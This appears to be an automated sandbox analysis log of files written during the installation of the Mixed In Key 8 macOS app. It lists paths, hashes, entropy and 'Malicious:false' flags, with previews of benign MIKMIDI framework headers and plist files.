                                                                                                    SHA-512:0C59E4309889EA0379FA129665A9BFD4C80DD1AC7D068687E4C4181C4D62A82860514C22EA286E6EE17647A1CEF9EE430BF660C36145CA6F0D554CFDFF0DF6C2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDISynthesizer_SubclassMethods.h.// MIKMIDI.//.// Created by Andrew Madsen on 2/26/15..// Copyright (c) 2015 Mixed In Key. All rights reserved..//..#import "MIKMIDISynthesizer.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN..@interface MIKMIDISynthesizer ()..- (BOOL)sendBankSelectAndProgramChangeForInstrumentID:(MusicDeviceInstrumentID)instrumentID error:(NSError **)error;..@property (nonatomic, readwrite, nullable) AudioUnit instrumentUnit;.@property (nonatomic, copy) OSStatus (^sendMIDICommand)(MIKMIDISynthesizer *synth, MusicDeviceComponent inUnit, UInt32 inStatus, UInt32 inData1, UInt32 inData2, UInt32 inOffsetSampleFrame);..@end..FOUNDATION_EXPORT OSStatus MIKMIDISynthesizerScheduleUpcomingMIDICommands(MIKMIDISynthesizer *synth,................... AudioUnit _Nullable instrumentUnit,................... UInt32 inNumberFrames,................... Float64 sampleRate,................... const AudioTimeStamp *inTimeStamp);..NS_ASSUME_NONNULL_END.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_rZwg5e
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):10292
                                                                                                    Entropy (8bit):4.9394195792990985
                                                                                                    Encrypted:false
                                                                                                    MD5:C1B05D647DE11E53D9C524BB41BE319A
                                                                                                    SHA1:58C87EA53B2505143DC0987B440130B18C0498B1
                                                                                                    SHA-256:8511C197F49E0E0E0DE99FED91EF0023D72445F0CE2B8354B5928345A6FC2DA1
                                                                                                    SHA-512:0AC71B654A9AAFF9E378987C501F8B3747D1346BCEF742D325E4904ABA10AA8D663328319B6BB92D0549A57C9313C31BAE896DFD6F1097263F6D3F1DFA541148
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIMapping.h.// Energetic.//.// Created by Andrew Madsen on 3/15/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import "MIKMIDICompilerCompatibility.h"..#import "MIKMIDICommand.h".#import "MIKMIDIResponder.h"..@protocol MIKMIDIMappableResponder;..@class MIKMIDIChannelVoiceCommand;.@class MIKMIDIMappingItem;..NS_ASSUME_NONNULL_BEGIN../**. * Overview. * --------. *. * MIKMIDIMapping includes represents a complete mapping between a particular hardware controller,. * and an application's functionality. Primarily, it acts as a container for MIKMIDIMappingItems,. * each of which specifies the mapping for a single hardware control.. *. * MIKMIDIMapping can be stored on disk using a straightforward XML format, and includes methods. * to load and write these XML files. Currently this is only implemented on OS X (see . * https://github.com/mixedinkey-opensource/MIKMIDI/issues/2 ).. *. * Another class, MIKMIDIMappingManag
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_tEYZU7
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode C++ program text
                                                                                                    Size (bytes):984
                                                                                                    Entropy (8bit):4.846917516525859
                                                                                                    Encrypted:false
                                                                                                    MD5:366CBFA18DD9F76DDA0675C0664663AE
                                                                                                    SHA1:BCAD7B5DB1BBBC521F8D3A6C04D7C6EC25EB4C14
                                                                                                    SHA-256:2CDA004503B8882DEDCA4343AFAE127865142758097363EDF5D615C2104D5174
                                                                                                    SHA-512:B8B8FB8304E4CD777F4B1D664DABF4A2D76ED4B33BD5F3197175FD77B2227044B74B426795481C6172E9AEDACF802A3DE706573BC058AA76C9642768F1041C1D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIMetaEvent_SubclassMethods.h.// MIKMIDI.//.// Created by Andrew Madsen on 11/10/15..// Copyright .. 2015 Mixed In Key. All rights reserved..//..#import "MIKMIDIMetaEvent.h".#import "MIKMIDIEvent_SubclassMethods.h"..@interface MIKMIDIMetaEvent ()../**. * Initializes a new MIKMIDIMetaEvent subclass with the specified data, inferring. * the meta data type using +supportedMIDIEventTypes. Only meant to be used internally. * to more easily implement custom initializers.. *. * @param metaData An NSData containing the metadata for the event.. * on this value. If this value is invalid or unknown, a plain MIKMIDIMetaEvent instance will be returned.. * @param timeStamp The MusicTimeStamp timestamp for the event.. *. * @return An initialized instance of MIKMIDIMetaEvent or one of its subclasses.. */.- (instancetype)initWithMetaData:(NSData *)metaData timeStamp:(MusicTimeStamp)timeStamp;..@property (nonatomic, strong, readwrite) NSData *metaData;..@end.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_tlbYiQ
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):1817
                                                                                                    Entropy (8bit):5.104546678450858
                                                                                                    Encrypted:false
                                                                                                    MD5:3CA9D646C12B1DE4E72CEE23357A09E2
                                                                                                    SHA1:ABB25074F618E881007743CC82D99F5027E441AE
                                                                                                    SHA-256:F5D0E63D77C784E724472A0DBA4847AE9BDF446A6DD5FA6F14A7503D6FE5D521
                                                                                                    SHA-512:532310AB40CB87C8C8A8CBD5A6E3CCC698D2D5655B872D1A89CE9CE6B030A227A9ADF48267B5472C853FE747672AA5922604F4905E459F96F07DC66657DA0946
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIChannelEvent.h.// MIKMIDI.//.// Created by Andrew Madsen on 3/3/15..// Copyright (c) 2015 Mixed In Key. All rights reserved..//..#import "MIKMIDIEvent.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN..@interface MIKMIDIChannelEvent : MIKMIDIEvent../**. * Convenience method for creating a new MIKMIDIChannelEvent from a CoreMIDI MIDIChannelMessage struct.. *. * @param timeStamp A MusicTimeStamp value indicating the timestamp for the event.. * @param message A MIDIChannelMessage struct containing properties for the event.. *. * @return A new instance of a subclass of MIKMIDIChannelEvent, or nil if there is an error.. */.+ (nullable instancetype)channelEventWithTimeStamp:(MusicTimeStamp)timeStamp message:(MIDIChannelMessage)message;..// Properties../**. * The channel for the MIDI event.. */.@property (nonatomic, readonly) UInt8 channel;../**. * The first byte of data for the event.. */.@property (nonatomic, readonly) UInt8 dataByte1;../**. * The
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_twCvxV
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):5653
                                                                                                    Entropy (8bit):4.842070663325969
                                                                                                    Encrypted:false
                                                                                                    MD5:E786FD2DF137DED359D84B3C8CFAD2EB
                                                                                                    SHA1:836FE502B91D4CB87693F0FC0818826B7368643E
                                                                                                    SHA-256:3A46917E29842B03070896B9CE850547A8A390FD0B340889F907E05FD9D21D83
                                                                                                    SHA-512:C2AA94DD649BFEB8208CF6C9072F4CDD5CA901C688C54B4E636E5AFF4044FA692363920F6D15FD31C81665A645308238A25963A99DF27BC4F961855D02E0BD4D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIDevice.h.// MIDI Testbed.//.// Created by Andrew Madsen on 3/7/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import "MIKMIDIObject.h".#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDIEntity;.@class MIKMIDIEndpoint;..NS_ASSUME_NONNULL_BEGIN../**. * MIKMIDIDevice represents a MIDI device such as a DJ controller, MIDI piano keyboard, etc.. *. * Overview. * --------. *. * MIDI devices are for example, DJ controllers, MIDI piano keyboards, etc. For many applications,. * being able to discover, connect to, and receive messages from devices is fundamental to their use of MIDI.. * Instances of MIKMIDIDevice represent a MIDI device and MIKMIDIDevice includes methods for. * retrieving information about the device as well as obtaining its MIDI entities and endpoints in order. * to communicate with it.. *. * MIDI devices can contain multiple entities, and each entity can contain multiple source and destination. * endpoints. Commonly, however, a
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_txQs4N
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):5281
                                                                                                    Entropy (8bit):4.768154939595193
                                                                                                    Encrypted:false
                                                                                                    MD5:3404519004DDAB96CB278DEEBBF8E4BF
                                                                                                    SHA1:A508BF4388F9DDC5BC67141E3CA2136197AEBCFB
                                                                                                    SHA-256:A68C069E64DA2074694D20536D29E0E0FCEB1560765F5FC850F1AF6C6503CBF4
                                                                                                    SHA-512:8BBBD93EA05D3DA75C163295829FF0CEB8D45B3AF638DB4C402EB828E0A6C823C0251FD0B597A3EA0EFF5C7970918359FE889956CE3D3410D64C0F0A0FF5A3EE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIEndpointSynthesizer.h.// MIKMIDI.//.// Created by Andrew Madsen on 5/27/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import "MIKMIDISynthesizer.h".#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDIEndpoint;.@class MIKMIDISourceEndpoint;.@class MIKMIDIClientDestinationEndpoint;.@class MIKMIDISynthesizerInstrument;..NS_ASSUME_NONNULL_BEGIN../**. * MIKMIDIEndpointSynthesizer is a subclass of MIKMIDISynthesizer that. * provides a very simple way to synthesize MIDI commands coming from a. * MIDI endpoint (e.g. from a connected MIDI piano keyboard) to produce sound output.. *. * To use it, simply create a synthesizer instance with the source you'd like it to play. It will. * continue playing incoming MIDI until it is deallocated.. *. * @see MIKMIDISynthesizer. */.@interface MIKMIDIEndpointSynthesizer : MIKMIDISynthesizer../**. * Creates and initializes an MIKMIDIEndpointSynthesizer instance using Apple's DLS synth as the. * underlying instr
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_w073Y2
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):7772
                                                                                                    Entropy (8bit):4.850138454865408
                                                                                                    Encrypted:false
                                                                                                    MD5:7A78AABE08224EA892B2D71FF66F3891
                                                                                                    SHA1:A3EB0B9BB9D740CB6E2208B1499F502CE94D8730
                                                                                                    SHA-256:E8B6BC0F01A10682AFF1BEF1C8F681DD1B109406B1A8A3129663D976C7C85A5E
                                                                                                    SHA-512:BAAEAAF3861339106EE604BD2A8F7919AEA321B33E300E72C903AE802D81983A96EBA12D0D2ED2A44F802B814E73923FB97726A93258866F96B7AADADEA710E4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIClock.h.// MIKMIDI.//.// Created by Chris Flesner on 11/26/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import <AudioToolbox/AudioToolbox.h>.#import "MIKMIDICompilerCompatibility.h"../**. * Returns the number of MIDITimeStamps that would occur during a specified time interval.. *. * @param timeInterval The number of seconds to convert into number of MIDITimeStamps.. *. * @return The number of MIDITimeStamps that would occur in the specified time interval.. */.Float64 MIKMIDIClockMIDITimeStampsPerTimeInterval(NSTimeInterval timeInterval);../**. * Returns the number of seconds per each MIDITimeStamp.. *. * @return Then number of seconds per each MIDITimeStamp.. */.Float64 MIKMIDIClockSecondsPerMIDITimeStamp(void);..NS_ASSUME_NONNULL_BEGIN../**. * MIKMIDIClock provides the number of seconds per MIDITimeStamp, as well as the. * number of MIDITimeStamps per a specified time interval.. *. * Instances of MIKMIDICl
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_w5kezn
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):3860
                                                                                                    Entropy (8bit):4.846368662909332
                                                                                                    Encrypted:false
                                                                                                    MD5:16035AE1DF42D3AF2C669ECABA04D2FB
                                                                                                    SHA1:14FDF8E12921ACF92987557C0BB7CCC666C95F5E
                                                                                                    SHA-256:20526E9C18C019BA1175856097A87010EAED06E3E790AEB2587E90C54C086F34
                                                                                                    SHA-512:FEC35C3693483D3637639454641929E679F543E1C708D527294DFEB1715C7652314E93E88C84F72526D9B94BE24088AFDFD6D55680F240F7FB8CAAA8EB0C737E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIMappingItem.h.// MIKMIDI.//.// Created by Andrew Madsen on 5/20/15..// Copyright (c) 2015 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import "MIKMIDIMappableResponder.h".#import "MIKMIDICommand.h".#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDIMapping;..NS_ASSUME_NONNULL_BEGIN../**. * MIKMIDIMappingItem contains information about a mapping between a physical MIDI control,. * and a single command supported by a particular MIDI responder object.. *. * MIKMIDIMappingItem specifies the command type, and MIDI channel for the commands sent by the. * mapped physical control along with the control's interaction type (e.g. knob, turntable, button, etc.).. * It also specifies the (software) MIDI responder to which incoming commands from the mapped control. * should be routed.. *. */.@interface MIKMIDIMappingItem : NSObject <NSCopying>../**. * Creates and initializes a new MIKMIDIMappingItem instance.. *. * @param MIDIResponderIdenti
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_wJFeop
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):10637
                                                                                                    Entropy (8bit):4.803735584974795
                                                                                                    Encrypted:false
                                                                                                    MD5:26FC1E0728F3BCAE3ED63EFC3AB2E97E
                                                                                                    SHA1:3CDB4C7219217F6DCABB9C1E05A017EF4EEA8304
                                                                                                    SHA-256:7F56D2625829C8F775C91DC7CE763623049F48891ED59F0F855C1F0CFBA6A099
                                                                                                    SHA-512:37AE66F94260BDE87C93BBDF8447641CFAF6CE7E7B0C2C1783B68C03D23B41AC5480AF2E4E6A358DF109B2420DF50E6C0D93C404DDFBB808C7C53FC77A3781CA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIMappingGenerator.h.// Danceability.//.// Created by Andrew Madsen on 7/19/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import "MIKMIDICompilerCompatibility.h"..#import "MIKMIDIMapping.h"..@class MIKMIDIDevice;.@class MIKMIDIMapping;.@class MIKMIDIMappingItem;.@class MIKMIDICommand;..@protocol MIKMIDIMappingGeneratorDelegate;..NS_ASSUME_NONNULL_BEGIN../**. * Completion block for mapping generation method.. *. * @param mappingItem The mapping item generated, or nil if mapping failed.. * @param messages The messages used to generate the mapping. May not include all messages received during mapping.. * @param error If mapping failed, an NSError explaing the failure, nil if mapping succeeded.. */.typedef void(^MIKMIDIMappingGeneratorMappingCompletionBlock)(MIKMIDIMappingItem *mappingItem, MIKArrayOf(MIKMIDICommand *) *messages, NSError *_Nullable error);../**. * MIKMIDIMappingGenerator is used to map incom
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_xGT9is
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):9319
                                                                                                    Entropy (8bit):4.811788918106093
                                                                                                    Encrypted:false
                                                                                                    MD5:583961E3724323562EBDD9224D286FCF
                                                                                                    SHA1:5A4D206362FA8D8AE446DA1C3AC49C44E1D9AEDA
                                                                                                    SHA-256:5657DF6629DCF41DE21350CABE5CB377B388746D59DC1C2DA8D01E341186BA1C
                                                                                                    SHA-512:11A91DEBFC7B2241E21DF943DD34F512CEAD4F958DEE19BFC98A9016DEE28A9976D76602A5A9BD0522F0A9BB6E9044E1067CDC338F3CDFF4B79C5124841CDFE3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIDeviceManager.h.// MIDI Testbed.//.// Created by Andrew Madsen on 3/7/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import "MIKMIDIInputPort.h".#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDIDevice;.@class MIKMIDISourceEndpoint;.@class MIKMIDIClientSourceEndpoint;.@class MIKMIDIDestinationEndpoint;.@class MIKMIDICommand;..NS_ASSUME_NONNULL_BEGIN..// Notifications./**. * Posted whenever a device is added (connected) to the system.. */.extern NSString * const MIKMIDIDeviceWasAddedNotification;../**. * Posted whenever a device is removed (disconnected) from the system.. */.extern NSString * const MIKMIDIDeviceWasRemovedNotification;../**. * Posted whenever a virtual endpoint is added to the system.. */.extern NSString * const MIKMIDIVirtualEndpointWasAddedNotification;../**. * Posted whenever a virtual endpoint is removed from the system.. */.extern NSString * const MIKMIDIVirtualEndpointWasRemovedNotifica
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Modules/.BC.T_G1b2lw
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII text
                                                                                                    Size (bytes):655
                                                                                                    Entropy (8bit):4.883244183562633
                                                                                                    Encrypted:false
                                                                                                    MD5:B3B734D40CC6F6AA272D9B1C84CE06A8
                                                                                                    SHA1:A8A17EA2A087AD75C42BE98112CB6FAE6ADFE54D
                                                                                                    SHA-256:C30C244F49FBE8D86398A7825CB38154499C277F1AC3600D5B1824B63FDE19A5
                                                                                                    SHA-512:5692398BA10764FF1ECD3D09EDE6593C0C44DD2FB3EB1C522F95178A9FEAAC9C0FAE5095556C5B759FE0A90B54FF4E84858C01776A9AB1813BD96D1927B3FD8E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: framework module MIKMIDI {..umbrella header "MIKMIDI.h"....private header "MIKMIDIPort_SubclassMethods.h"..private header "MIKMIDISynthesizer_SubclassMethods.h"..private header "MIKMIDITransmittable.h"....export *..module * { export * }....explicit module MIKMIDICommandSubclass {...header "MIKMIDICommand_SubclassMethods.h"...export *..}....explicit module MIKMIDIEventSubclass {...header "MIKMIDIEvent_SubclassMethods.h"...export *..}....explicit module MIKMIDIMetaEventSubclass {...header "MIKMIDIMetaEvent_SubclassMethods.h"...export *..}....explicit module MIKMIDISynthesizerSubclass {...header "MIKMIDISynthesizer_SubclassMethods.h"...export *..}.}.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/PrivateHeaders/.BC.T_h2L2iD
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):376
                                                                                                    Entropy (8bit):5.216177249664715
                                                                                                    Encrypted:false
                                                                                                    MD5:3E26EC90EDA1624087B1ECC2B739F8F3
                                                                                                    SHA1:1063A83098C68352605A6BD5235234876C39284A
                                                                                                    SHA-256:F9D5CE938DCD952EF456C278928E9C5376B52F45FD56224407FFD22516B70C6F
                                                                                                    SHA-512:07016F81E23CB8F1CC8AE0E404FDBF1C59D77B728C403B9DB4B5F286CCE9E7A4EBB321434278759FEAD2E61F021226C11D86AEF47C02D3D8BC8E02DB4A50469B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIPort_SubclassMethods.h.// MIDI Testbed.//.// Created by Andrew Madsen on 3/8/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import <MIKMIDI/MIKMIDIPort.h>.#import <MIKMIDI/MIKMIDICompilerCompatibility.h>..NS_ASSUME_NONNULL_BEGIN..@interface MIKMIDIPort ()..@property (nonatomic, readwrite) MIDIPortRef portRef;..@end..NS_ASSUME_NONNULL_END.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/PrivateHeaders/.BC.T_hbF55D
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):1205
                                                                                                    Entropy (8bit):5.265078373096887
                                                                                                    Encrypted:false
                                                                                                    MD5:C60C5BBA4F98B44449DBEE3B8DBDEF67
                                                                                                    SHA1:24DCEA3A09F93B996B7CF3D89EF640A777F78C77
                                                                                                    SHA-256:DF9400DB69094C3742B4EC119D1363EDB2564B115524ADBE560D076242F36068
                                                                                                    SHA-512:538E42842955FD5182399E874DE7AEE224F9106BD0B34E1D577E4CB1B236EDC234EC8185B9C14BFA29B0445591BCC2EC8B72529CC5404ED5184A148469A2F4A7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIEventIterator.h.// MIKMIDI.//.// Created by Chris Flesner on 9/9/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import <AudioToolbox/AudioToolbox.h>.#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDITrack;.@class MIKMIDIEvent;..NS_ASSUME_NONNULL_BEGIN../**. * MIKMIDIEventIterator is an Objective-C wrapper for CoreMIDI's MusicEventIterator. It is not intended for use by clients/users of. * of MIKMIDI. Rather, it should be thought of as an MIKMIDI private class.. */.@interface MIKMIDIEventIterator : NSObject..@property (nonatomic, readonly) BOOL hasPreviousEvent;.@property (nonatomic, readonly) BOOL hasCurrentEvent;.@property (nonatomic, readonly) BOOL hasNextEvent;.@property (nonatomic, readonly, nullable) MIKMIDIEvent *currentEvent;..- (nullable instancetype)initWithTrack:(MIKMIDITrack *)track;.+ (nullable instancetype)iteratorForTrack:(MIKMIDITrack *)track;..- (BOOL)seek:(MusicTimeStamp)timeStamp;.- (BOOL)mo
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Resources/.BC.T_Zu1bJu
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):1341
                                                                                                    Entropy (8bit):5.248418004712525
                                                                                                    Encrypted:false
                                                                                                    MD5:4808A6CF5EF2BDF47535009107B9EED8
                                                                                                    SHA1:4F0AE69A41A858D4023DF36B7EB8BC7F0FCF2874
                                                                                                    SHA-256:0162EDEA04EF238C76F24D63BEF7B3F50A2129B9BEA1558681F1A28F0E7884E0
                                                                                                    SHA-512:60B12E155639C372F996C3872E3234293EE2EE8881D95F2A7E132336282D25733C27BEDEC54DA42C2992FC981D193DDE50698F0637FDD7AA9613154C17D9A4EF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>BuildMachineOSBuild</key>..<string>18G95</string>..<key>CFBundleDevelopmentRegion</key>..<string>English</string>..<key>CFBundleExecutable</key>..<string>MIKMIDI</string>..<key>CFBundleIdentifier</key>..<string>com.mixedinkey.MIKMIDI</string>..<key>CFBundleInfoDictionaryVersion</key>..<string>6.0</string>..<key>CFBundleName</key>..<string>MIKMIDI</string>..<key>CFBundlePackageType</key>..<string>FMWK</string>..<key>CFBundleShortVersionString</key>..<string>1.5</string>..<key>CFBundleSignature</key>..<string>????</string>..<key>CFBundleSupportedPlatforms</key>..<array>...<string>MacOSX</string>..</array>..<key>CFBundleVersion</key>..<string>877</string>..<key>DTCompiler</key>..<string>com.apple.compilers.llvm.clang.1_0</string>..<key>DTPlatformBuild</key>..<string>9F2000</string>..<key>DTPlatformVersion</key>..<s
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/_CodeSignature/.BC.T_Y4P3Ft
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):19698
                                                                                                    Entropy (8bit):5.312295442155583
                                                                                                    Encrypted:false
                                                                                                    MD5:3FBEF3AD065DE3EDC96DD32524BB1E84
                                                                                                    SHA1:91D21BB5B1AB6B63558D0BC5D6E36EB678B9AF30
                                                                                                    SHA-256:146B7D2E3F023ABE2D63E6910D2F72149CA420F26D39EDB8B2C4F29811B4AC9A
                                                                                                    SHA-512:EACB3C626B9F521E84FF46D810330C088B78947CB18F4DDA1199750C9EC6EE8638297B00795924C512C2F4CE2DB55F6916A01505FD420E4D84AAAC396DF7D4B4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>files</key>..<dict>...<key>Resources/Info.plist</key>...<data>...TwrmmkGoWNQCPfNrfri8fw/PKHQ=...</data>..</dict>..<key>files2</key>..<dict>...<key>Headers/MIKMIDI.h</key>...<dict>....<key>hash</key>....<data>....AkdZmPvJe13nHMk4attbgvbmUi8=....</data>....<key>hash2</key>....<data>....rtvs9hK4X4flU8FsG+E8Zb5+K4fZSywKXenDLUOBRwQ=....</data>...</dict>...<key>Headers/MIKMIDIChannelEvent.h</key>...<dict>....<key>hash</key>....<data>....q7JQdPYY6IEAd0PMgtmfUCfkQa4=....</data>....<key>hash2</key>....<data>....9dDmPXfHhOckRyoNukhHrpvfRGpt1fpvFKdQPW/l1SE=....</data>...</dict>...<key>Headers/MIKMIDIChannelPressureCommand.h</key>...<dict>....<key>hash</key>....<data>....RbXnH05V1ajJVEhDFox5/mnoqxw=....</data>....<key>hash2</key>....<data>....03Z/Ql9YdEi7sL0BroKanDuvT/PJgLujNSr1Auv6Mnw=....</data>...</dict>...<key>Headers/M
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/.BC.T_LnNzCu
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mach-O 64-bit dynamically linked shared library
                                                                                                    Size (bytes):675280
                                                                                                    Entropy (8bit):6.0160982216274
                                                                                                    Encrypted:false
                                                                                                    MD5:163DF8223155C4AB38E3D210944F08C9
                                                                                                    SHA1:7EE3B3A629506E4C3405094F33C88DBBBA918C3C
                                                                                                    SHA-256:F5072A82C7D2B7D4B5AE9728A76426FFDB8B1FAAC00E1745B73BA0F85A7CC2DB
